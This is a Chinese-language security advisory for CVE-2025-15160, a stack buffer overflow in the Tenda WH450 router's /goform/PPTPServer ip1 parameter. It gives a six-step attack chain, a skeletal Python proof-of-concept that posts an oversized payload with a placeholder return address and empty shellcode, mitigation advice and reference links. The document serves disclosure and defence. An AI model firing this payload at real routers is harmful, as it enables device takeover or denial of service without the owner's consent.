CVE-2025-15160 Tenda WH450路由器栈缓冲区溢出漏洞

漏洞信息

漏洞编号

CVE-2025-15160

漏洞类型

栈缓冲区溢出

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Tenda WH450

漏洞概述

CVE-2025-15160是存在于Tenda WH450路由器1.0.0.18版本中的一个高危安全漏洞。该漏洞位于设备的/goform/PPTPServer接口，由于对ip1参数处理不当，导致栈缓冲区溢出。攻击者可通过远程发送精心构造的恶意请求来触发此漏洞。成功利用此漏洞可实现远程代码执行，获得设备的完全控制权。由于该漏洞的CVSS评分为7.2，属于高危级别，且已公开披露并可能存在在野利用，强烈建议用户立即采取防护措施。此漏洞影响路由器的PPTPServer功能，攻击者无需用户交互即可发起攻击，但需要具备高权限认证。

技术细节

该漏洞为典型的栈缓冲区溢出问题，存在于Tenda WH450路由器的Web管理界面/goform/PPTPServer接口中。漏洞根本原因是对用户输入的ip1参数缺乏有效的长度检查和边界验证。当攻击者向该接口发送超长的ip1参数值时，超出的数据会覆盖栈上的相邻内存区域，包括返回地址、函数指针等关键数据。攻击者可以通过精心构造溢出数据，覆盖栈帧中的返回地址，使其指向恶意代码，从而在设备上执行任意命令。由于路由器通常以root权限运行，攻击成功后将获得设备的完全控制权。该漏洞属于远程攻击，攻击者可通过网络直接发起请求，无需物理接触设备。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标为Tenda WH450路由器，确认设备IP地址和Web管理界面可访问

STEP 2

步骤2：认证获取

攻击者获取路由器的高权限账号（管理员权限），可通过默认凭证、暴力破解或其他方式获得

STEP 3

步骤3：构造恶意请求

攻击者构造包含超长ip1参数的POST请求，数据包发送到/goform/PPTPServer接口

STEP 4

步骤4：触发溢出

恶意请求被服务器处理，ip1参数值超出栈缓冲区边界，覆盖栈上的返回地址和关键数据

STEP 5

步骤5：代码执行

通过覆盖返回地址，劫持程序控制流，执行攻击者植入的恶意代码或shellcode

STEP 6

步骤6：持久化控制

成功执行代码后，攻击者可获得路由器root权限，实现持久化控制、植入后门或进一步渗透内网

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-15160 PoC - Tenda WH450 Stack Buffer Overflow
Affected: Tenda WH450 1.0.0.18
Type: Stack-based buffer overflow in /goform/PPTPServer (ip1 parameter)
CVSS: 7.2 (High)
"""

import requests
import sys

TARGET_IP = "192.168.0.1"  # Router IP
TARGET_PORT = 80
TARGET_URL = f"http://{TARGET_IP}:{TARGET_PORT}/goform/PPTPServer"

# Generate overflow payload
# Stack buffer overflow in ip1 parameter
# Adjust length based on actual buffer size
OVERFLOW_LENGTH = 1024

def create_payload():
    """Create malicious payload for ip1 parameter"""
    # Padding to overflow the buffer
    padding = b"A" * OVERFLOW_LENGTH
    # Overwrite return address (little-endian)
    return_addr = b"\x12\x34\x56\x78"  # Replace with actual gadget address
    # Optional: Add shellcode for code execution
    shellcode = b""  # Add MIPS shellcode if needed
    
    payload = padding + return_addr + shellcode
    return payload

def exploit():
    """Send exploit request to vulnerable endpoint"""
    payload = create_payload()
    
    data = {
        "ip1": payload.decode('latin-1'),
        "ip2": "192.168.1.1",  # Normal PPTP server IP
        "enable": "1"
    }
    
    try:
        print(f"[*] Sending exploit to {TARGET_URL}")
        print(f"[*] Payload length: {len(payload)} bytes")
        
        response = requests.post(TARGET_URL, data=data, timeout=10)
        print(f"[*] Response status: {response.status_code}")
        print(f"[*] Response: {response.text[:200]}")
        
        return True
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_IP = sys.argv[1]
    
    print("="*60)
    print("CVE-2025-15160 - Tenda WH450 Stack Buffer Overflow PoC")
    print("="*60)
    exploit()

影响范围

Tenda WH450 1.0.0.18

防御指南

临时缓解措施

由于该漏洞已公开披露且可能存在在野利用，建议立即采取以下措施：1) 确认路由器是否暴露在公网，如非必要应关闭远程管理功能；2) 检查并修改路由器默认管理凭证；3) 关注Tenda官方安全公告，及时更新固件；4) 在网络层面限制对路由器管理接口的访问，仅允许受信任的IP地址访问；5) 监控网络流量异常，特别是对/goform/PPTPServer接口的异常请求；6) 如暂时无法升级固件，可考虑使用防火墙规则阻止对路由器Web管理界面的外部访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15160
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15160
3 Details https://www.cvedetails.com/cve/CVE-2025-15160/
4 VulDB https://vuldb.com/cve/CVE-2025-15160
5 Link https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/PPTPServer/PPTPServer.md
6 Link https://vuldb.com/?ctiid.338535
7 Link https://vuldb.com/?id.338535
8 Link https://vuldb.com/?submit.720886
9 Link https://www.tenda.com.cn/